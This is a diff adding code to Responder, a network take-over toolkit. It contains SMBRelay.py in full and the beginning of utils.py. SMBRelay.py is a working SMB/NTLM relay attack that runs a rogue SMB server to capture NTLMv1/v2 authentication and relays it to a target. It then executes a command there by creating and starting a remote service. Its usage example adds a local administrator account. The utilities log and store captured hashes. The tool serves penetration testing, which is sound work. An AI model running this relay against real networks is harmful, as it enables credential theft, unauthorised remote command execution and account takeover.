("Empty", "\x00\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
422
tools/SMBRelay.py
Executable file
422
tools/SMBRelay.py
Executable file
@@ -0,0 +1,422 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import sys
|
||||||
|
import random
|
||||||
|
import optparse
|
||||||
|
import thread
|
||||||
|
sys.path.append('../')
|
||||||
|
from fingerprint import RunSmbFinger
|
||||||
|
from socket import *
|
||||||
|
from RelayPackets import *
|
||||||
|
from packets import *
|
||||||
|
from servers.SMB import *
|
||||||
|
from packets import Packet
|
||||||
|
|
||||||
|
import logging
|
||||||
|
Logs = logging
|
||||||
|
Logs.basicConfig(filemode="w",filename='SMBRelay-Session.txt',format='',level=logging.DEBUG)
|
||||||
|
|
||||||
|
|
||||||
|
def longueur(payload):
|
||||||
|
return struct.pack(">i", len(''.join(payload)))
|
||||||
|
|
||||||
|
|
||||||
|
def UserCallBack(op, value, dmy, parser):
|
||||||
|
args=[]
|
||||||
|
for arg in parser.rargs:
|
||||||
|
if arg[0] != "-":
|
||||||
|
args.append(arg)
|
||||||
|
if getattr(parser.values, op.dest):
|
||||||
|
args.extend(getattr(parser.values, op.dest))
|
||||||
|
setattr(parser.values, op.dest, args)
|
||||||
|
|
||||||
|
parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin", prog=sys.argv[0],)
|
||||||
|
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="Responder_IP")
|
||||||
|
parser.add_option('-c',action='store', help='Command to run on the target.',metavar='"net user Responder Quol0eeP/e}X /ADD"',dest='CMD')
|
||||||
|
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
|
||||||
|
parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")
|
||||||
|
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
|
||||||
|
|
||||||
|
options, args = parser.parse_args()
|
||||||
|
|
||||||
|
if options.CMD is None:
|
||||||
|
print "\n-c mandatory option is missing, please provide a command to execute on the target.\n"
|
||||||
|
parser.print_help()
|
||||||
|
exit(-1)
|
||||||
|
elif options.TARGET is None:
|
||||||
|
print "\n-t mandatory option is missing, please provide a target.\n"
|
||||||
|
parser.print_help()
|
||||||
|
exit(-1)
|
||||||
|
elif options.UserToRelay is None:
|
||||||
|
print "\n-u mandatory option is missing, please provide a username to relay.\n"
|
||||||
|
parser.print_help()
|
||||||
|
exit(-1)
|
||||||
|
|
||||||
|
ResponderPATH = os.path.dirname(__file__)
|
||||||
|
UserToRelay = options.UserToRelay
|
||||||
|
Domain = options.Domain
|
||||||
|
Command = options.CMD
|
||||||
|
Target = options.TARGET
|
||||||
|
Responder_IP = options.Responder_IP
|
||||||
|
|
||||||
|
print "\nResponder SMBRelay 0.1\nPlease send bugs/comments to: laurent.gaffie@gmail.com"
|
||||||
|
print '\033[31m'+'Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..\nUsernames to relay (-u) are case sensitive.'+'\033[0m'
|
||||||
|
print 'To kill this script hit CRTL-C or Enter\nWill relay credentials for these users: '+'\033[1m\033[34m'+', '.join(UserToRelay)+'\033[0m\n'
|
||||||
|
|
||||||
|
#Function used to verify if a previous auth attempt was made.
|
||||||
|
def ReadData(outfile,Client, User, cmd=None):
|
||||||
|
try:
|
||||||
|
with open(ResponderPATH+outfile,"r") as filestr:
|
||||||
|
if cmd is None:
|
||||||
|
String = Client+':'+User
|
||||||
|
if re.search(String.encode('hex'), filestr.read().encode('hex')):
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
if cmd is not None:
|
||||||
|
String = Client+","+User+","+cmd
|
||||||
|
if re.search(String.encode('hex'), filestr.read().encode('hex')):
|
||||||
|
print "[+] Command: %s was previously executed on host: %s. Won't execute again.\n" %(cmd, Client)
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
except:
|
||||||
|
raise
|
||||||
|
|
||||||
|
#Function used to parse SMB NTLMv1/v2
|
||||||
|
def ParseHash(data,Client, Target):
|
||||||
|
try:
|
||||||
|
lenght = struct.unpack('<H',data[43:45])[0]
|
||||||
|
LMhashLen = struct.unpack('<H',data[51:53])[0]
|
||||||
|
NthashLen = struct.unpack('<H',data[53:55])[0]
|
||||||
|
Bcc = struct.unpack('<H',data[63:65])[0]
|
||||||
|
if NthashLen >= 30:
|
||||||
|
Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
|
||||||
|
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
|
||||||
|
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
|
||||||
|
Username, Domain = tuple(var)
|
||||||
|
if ReadData("SMBRelay-Session.txt", Client, Username):
|
||||||
|
print "[+]Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
|
||||||
|
if Username in UserToRelay:
|
||||||
|
print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
|
||||||
|
print "Username : ",Username
|
||||||
|
print "Domain (if joined, if not then computer name) : ",Domain
|
||||||
|
return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
|
||||||
|
if NthashLen == 24:
|
||||||
|
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
|
||||||
|
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
|
||||||
|
Username, Domain = tuple(var)
|
||||||
|
if ReadData("SMBRelay-Session.txt", Client, Username):
|
||||||
|
print "Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
|
||||||
|
if Username in UserToRelay:
|
||||||
|
print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
|
||||||
|
LMHashing = data[65:65+LMhashLen].encode('hex').upper()
|
||||||
|
NTHashing = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
|
||||||
|
print "Username : ",Username
|
||||||
|
print "Domain (if joined, if not then computer name) : ",Domain
|
||||||
|
return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
|
||||||
|
else:
|
||||||
|
print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s"%(Username,UserToRelay)
|
||||||
|
except Exception:
|
||||||
|
raise
|
||||||
|
|
||||||
|
#Detect if SMB auth was Anonymous
|
||||||
|
def Is_Anonymous(data):
|
||||||
|
LMhashLen = struct.unpack('<H',data[51:53])[0]
|
||||||
|
if LMhashLen == 0 or LMhashLen == 1:
|
||||||
|
print "SMB Anonymous login requested, trying to force client to auth with credz."
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def ParseDomain(data):
|
||||||
|
return ''.join(data[81:].split('\x00\x00\x00')[:1])+'\x00\x00\x00'
|
||||||
|
|
||||||
|
#Function used to know which dialect number to return for NT LM 0.12
|
||||||
|
def Parse_Nego_Dialect(data):
|
||||||
|
DialectStart = data[40:]
|
||||||
|
pack = tuple(DialectStart.split('\x02'))[:10]
|
||||||
|
var = [e.replace('\x00','') for e in DialectStart.split('\x02')[:10]]
|
||||||
|
test = tuple(var)
|
||||||
|
if test[0] == "NT LM 0.12":
|
||||||
|
return "\x00\x00"
|
||||||
|
if test[1] == "NT LM 0.12":
|
||||||
|
return "\x01\x00"
|
||||||
|
if test[2] == "NT LM 0.12":
|
||||||
|
return "\x02\x00"
|
||||||
|
if test[3] == "NT LM 0.12":
|
||||||
|
return "\x03\x00"
|
||||||
|
if test[4] == "NT LM 0.12":
|
||||||
|
return "\x04\x00"
|
||||||
|
if test[5] == "NT LM 0.12":
|
||||||
|
return "\x05\x00"
|
||||||
|
if test[6] == "NT LM 0.12":
|
||||||
|
return "\x06\x00"
|
||||||
|
if test[7] == "NT LM 0.12":
|
||||||
|
return "\x07\x00"
|
||||||
|
if test[8] == "NT LM 0.12":
|
||||||
|
return "\x08\x00"
|
||||||
|
if test[9] == "NT LM 0.12":
|
||||||
|
return "\x09\x00"
|
||||||
|
if test[10] == "NT LM 0.12":
|
||||||
|
return "\x0a\x00"
|
||||||
|
|
||||||
|
def SmbRogueSrv139(key,Target,DomainMachineName):
|
||||||
|
s = socket(AF_INET,SOCK_STREAM)
|
||||||
|
s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
|
||||||
|
s.settimeout(30)
|
||||||
|
try:
|
||||||
|
s.bind(('0.0.0.0', 139))
|
||||||
|
s.listen(0)
|
||||||
|
conn, addr = s.accept()
|
||||||
|
except error, msg:
|
||||||
|
if "Address already in use" in msg:
|
||||||
|
print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
|
||||||
|
|
||||||
|
try:
|
||||||
|
while True:
|
||||||
|
data = conn.recv(1024)
|
||||||
|
##session request 139
|
||||||
|
if data[0] == "\x81":
|
||||||
|
buffer0 = "\x82\x00\x00\x00"
|
||||||
|
conn.send(buffer0)
|
||||||
|
##Negotiate proto answer.
|
||||||
|
if data[8:10] == "\x72\x00":
|
||||||
|
head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
|
||||||
|
t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
|
||||||
|
t.calculate()
|
||||||
|
packet1 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet1)+packet1
|
||||||
|
conn.send(buffer1)
|
||||||
|
##Session Setup AndX Request
|
||||||
|
if data[8:10] == "\x73\x00":
|
||||||
|
if Is_Anonymous(data):
|
||||||
|
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
packet1 = str(head)+str(SMBSessEmpty())
|
||||||
|
buffer1 = longueur(packet1)+packet1
|
||||||
|
conn.send(buffer1)
|
||||||
|
else:
|
||||||
|
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
|
||||||
|
buffer1 = longueur(packet1)+packet1
|
||||||
|
conn.send(buffer1)
|
||||||
|
Credz = ParseHash(data,addr[0],Target)
|
||||||
|
return Credz
|
||||||
|
except:
|
||||||
|
return None
|
||||||
|
|
||||||
|
def RunRelay(host, Command,Domain):
|
||||||
|
Target = host
|
||||||
|
CMD = Command
|
||||||
|
print "Target is running: ", RunSmbFinger((host, 445))
|
||||||
|
s = socket(AF_INET, SOCK_STREAM)
|
||||||
|
s.connect((host, 445))
|
||||||
|
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff")
|
||||||
|
n = SMBNego(Data = SMBNegoData())
|
||||||
|
n.calculate()
|
||||||
|
packet0 = str(h)+str(n)
|
||||||
|
buffer0 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer0)
|
||||||
|
data = s.recv(2048)
|
||||||
|
Key = ParseAnswerKey(data,host)
|
||||||
|
DomainMachineName = ParseDomain(data)
|
||||||
|
if data[8:10] == "\x72\x00":
|
||||||
|
try:
|
||||||
|
a = SmbRogueSrv139(Key,Target,DomainMachineName)
|
||||||
|
if a is not None:
|
||||||
|
LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
|
||||||
|
if Domain is None:
|
||||||
|
Domain = OriginalDomain
|
||||||
|
if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
|
||||||
|
t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
except:
|
||||||
|
raise
|
||||||
|
a = None
|
||||||
|
if data[8:10] == "\x73\x6d":
|
||||||
|
print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
|
||||||
|
Logs.info(CLIENTIP+":"+Username)
|
||||||
|
if data[8:10] == "\x73\x0d":
|
||||||
|
print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
|
||||||
|
Logs.info(CLIENTIP+":"+Username)
|
||||||
|
## NtCreateAndx
|
||||||
|
if data[8:10] == "\x73\x00":
|
||||||
|
print "[+] Authenticated, trying to PSexec on target !"
|
||||||
|
head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
t = SMBNTCreateData()
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## Fail Handling.
|
||||||
|
if data[8:10] == "\xa2\x22":
|
||||||
|
print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
|
||||||
|
## DCE/RPC Write.
|
||||||
|
if data[8:10] == "\xa2\x00":
|
||||||
|
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
x = SMBDCEData()
|
||||||
|
x.calculate()
|
||||||
|
f = data[42:44]
|
||||||
|
t = SMBWriteData(FID=f,Data=x)
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC Read.
|
||||||
|
if data[8:10] == "\x2f\x00":
|
||||||
|
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
t = SMBReadData(FID=f)
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC SVCCTLOpenManagerW.
|
||||||
|
if data[8:10] == "\x2e\x00":
|
||||||
|
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
|
||||||
|
w.calculate()
|
||||||
|
x = SMBDCEPacketData(Data=w)
|
||||||
|
x.calculate()
|
||||||
|
t = SMBWriteData(FID=f,Data=x)
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC Read Answer.
|
||||||
|
if data[8:10] == "\x2f\x00":
|
||||||
|
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
t = SMBReadData(FID=f)
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC SVCCTLCreateService.
|
||||||
|
if data[8:10] == "\x2e\x00":
|
||||||
|
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
||||||
|
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
|
||||||
|
print "[+] Creating service"
|
||||||
|
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
ContextHandler = data[88:108]
|
||||||
|
ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
|
||||||
|
ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
|
||||||
|
FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
|
||||||
|
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
|
||||||
|
w.calculate()
|
||||||
|
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
|
||||||
|
x.calculate()
|
||||||
|
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC Read Answer.
|
||||||
|
if data[8:10] == "\x2f\x00":
|
||||||
|
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC SVCCTLOpenService.
|
||||||
|
if data[8:10] == "\x2e\x00":
|
||||||
|
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
||||||
|
print "[+] Failed to create the service"
|
||||||
|
|
||||||
|
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
|
||||||
|
w.calculate()
|
||||||
|
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
|
||||||
|
x.calculate()
|
||||||
|
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC Read Answer.
|
||||||
|
if data[8:10] == "\x2f\x00":
|
||||||
|
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC SVCCTLStartService.
|
||||||
|
if data[8:10] == "\x2e\x00":
|
||||||
|
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
||||||
|
print "[+] Failed to open the service"
|
||||||
|
ContextHandler = data[88:108]
|
||||||
|
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
|
||||||
|
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
|
||||||
|
x.calculate()
|
||||||
|
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
## DCE/RPC Read Answer.
|
||||||
|
if data[8:10] == "\x2f\x00":
|
||||||
|
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||||
|
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
|
||||||
|
t.calculate()
|
||||||
|
packet0 = str(head)+str(t)
|
||||||
|
buffer1 = longueur(packet0)+packet0
|
||||||
|
s.send(buffer1)
|
||||||
|
data = s.recv(2048)
|
||||||
|
if data[8:10] == "\x2e\x00":
|
||||||
|
print "[+] Command successful !"
|
||||||
|
Logs.info('Command successful:')
|
||||||
|
Logs.info(Target+","+Username+','+CMD)
|
||||||
|
return True
|
||||||
|
if data[8:10] != "\x2e\x00":
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
def RunInloop(Target,Command,Domain):
|
||||||
|
try:
|
||||||
|
while True:
|
||||||
|
worker = RunRelay(Target,Command,Domain)
|
||||||
|
except:
|
||||||
|
raise
|
||||||
|
|
||||||
|
|
||||||
|
def main():
|
||||||
|
try:
|
||||||
|
thread.start_new(RunInloop,(Target,Command,Domain))
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
exit()
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
try:
|
||||||
|
main()
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
raise
|
||||||
|
raw_input()
|
||||||
312
utils.py
Normal file
312
utils.py
Normal file
@@ -0,0 +1,312 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import re
|
||||||
|
import logging
|
||||||
|
import socket
|
||||||
|
import time
|
||||||
|
import settings
|
||||||
|
import datetime
|
||||||
|
|
||||||
|
def HTTPCurrentDate():
|
||||||
|
Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
|
||||||
|
return Date
|
||||||
|
try:
|
||||||
|
import sqlite3
|
||||||
|
except:
|
||||||
|
print "[!] Please install python-sqlite3 extension."
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
|
def color(txt, code = 1, modifier = 0):
|
||||||
|
if txt.startswith('[*]'):
|
||||||
|
settings.Config.PoisonersLogger.warning(txt)
|
||||||
|
elif 'Analyze' in txt:
|
||||||
|
settings.Config.AnalyzeLogger.warning(txt)
|
||||||
|
|
||||||
|
if os.name == 'nt': # No colors for windows...
|
||||||
|
return txt
|
||||||
|
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
|
||||||
|
|
||||||
|
def text(txt):
|
||||||
|
stripcolors = re.sub(r'\x1b\[([0-9,A-Z]{1,2}(;[0-9]{1,2})?(;[0-9]{3})?)?[m|K]?', '', txt)
|
||||||
|
logging.info(stripcolors)
|
||||||
|
if os.name == 'nt':
|
||||||
|
return txt
|
||||||
|
return '\r' + re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
|
||||||
|
|
||||||
|
def IsOnTheSameSubnet(ip, net):
|
||||||
|
net += '/24'
|
||||||
|
ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
|
||||||
|
netstr, bits = net.split('/')
|
||||||
|
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
|
||||||
|
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
|
||||||
|
return (ipaddr & mask) == (netaddr & mask)
|
||||||
|
|
||||||
|
def RespondToThisIP(ClientIp):
|
||||||
|
|
||||||
|
if ClientIp.startswith('127.0.0.'):
|
||||||
|
return False
|
||||||
|
elif settings.Config.AutoIgnore and ClientIp in settings.Config.AutoIgnoreList:
|
||||||
|
print color('[*]', 3, 1), 'Received request from auto-ignored client %s, not answering.' % ClientIp
|
||||||
|
return False
|
||||||
|
elif settings.Config.RespondTo and ClientIp not in settings.Config.RespondTo:
|
||||||
|
return False
|
||||||
|
elif ClientIp in settings.Config.RespondTo or settings.Config.RespondTo == []:
|
||||||
|
if ClientIp not in settings.Config.DontRespondTo:
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def RespondToThisName(Name):
|
||||||
|
if settings.Config.RespondToName and Name.upper() not in settings.Config.RespondToName:
|
||||||
|
return False
|
||||||
|
elif Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
|
||||||
|
if Name.upper() not in settings.Config.DontRespondToName:
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def RespondToThisHost(ClientIp, Name):
|
||||||
|
return RespondToThisIP(ClientIp) and RespondToThisName(Name)
|
||||||
|
|
||||||
|
def OsInterfaceIsSupported():
|
||||||
|
if settings.Config.Interface != "Not set":
|
||||||
|
return not IsOsX()
|
||||||
|
return False
|
||||||
|
|
||||||
|
def IsOsX():
|
||||||
|
return sys.platform == "darwin"
|
||||||
|
|
||||||
|
def FindLocalIP(Iface, OURIP):
|
||||||
|
if Iface == 'ALL':
|
||||||
|
return '0.0.0.0'
|
||||||
|
|
||||||
|
try:
|
||||||
|
if IsOsX():
|
||||||
|
return OURIP
|
||||||
|
elif OURIP == None:
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||||
|
s.setsockopt(socket.SOL_SOCKET, 25, Iface+'\0')
|
||||||
|
s.connect(("127.0.0.1",9))#RFC 863
|
||||||
|
ret = s.getsockname()[0]
|
||||||
|
s.close()
|
||||||
|
return ret
|
||||||
|
return OURIP
|
||||||
|
except socket.error:
|
||||||
|
print color("[!] Error: %s: Interface not found" % Iface, 1)
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
# Function used to write captured hashs to a file.
|
||||||
|
def WriteData(outfile, data, user):
|
||||||
|
logging.info("[*] Captured Hash: %s" % data)
|
||||||
|
if not os.path.isfile(outfile):
|
||||||
|
with open(outfile,"w") as outf:
|
||||||
|
outf.write(data + '\n')
|
||||||
|
return
|
||||||
|
with open(outfile,"r") as filestr:
|
||||||
|
if re.search(user.encode('hex'), filestr.read().encode('hex')):
|
||||||
|
return False
|
||||||
|
elif re.search(re.escape("$"), user):
|
||||||
|
return False
|
||||||
|
with open(outfile,"a") as outf2:
|
||||||
|
outf2.write(data + '\n')
|
||||||
|
|
||||||
|
|
||||||
|
def SaveToDb(result):
|
||||||
|
# Creating the DB if it doesn't exist
|
||||||
|
if not os.path.exists(settings.Config.DatabaseFile):
|
||||||
|
cursor = sqlite3.connect(settings.Config.DatabaseFile)
|
||||||
|
cursor.execute('CREATE TABLE responder (timestamp varchar(32), module varchar(16), type varchar(16), client varchar(32), hostname varchar(32), user varchar(32), cleartext varchar(128), hash varchar(512), fullhash varchar(512))')
|
||||||
|
cursor.commit()
|
||||||
|
cursor.close()
|
||||||
|
|
||||||
|
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
|
||||||
|
if not k in result:
|
||||||
|
result[k] = ''
|
||||||
|
|
||||||
|
if len(result['user']) < 2:
|
||||||
|
return
|
||||||
|
|
||||||
|
if len(result['cleartext']):
|
||||||
|
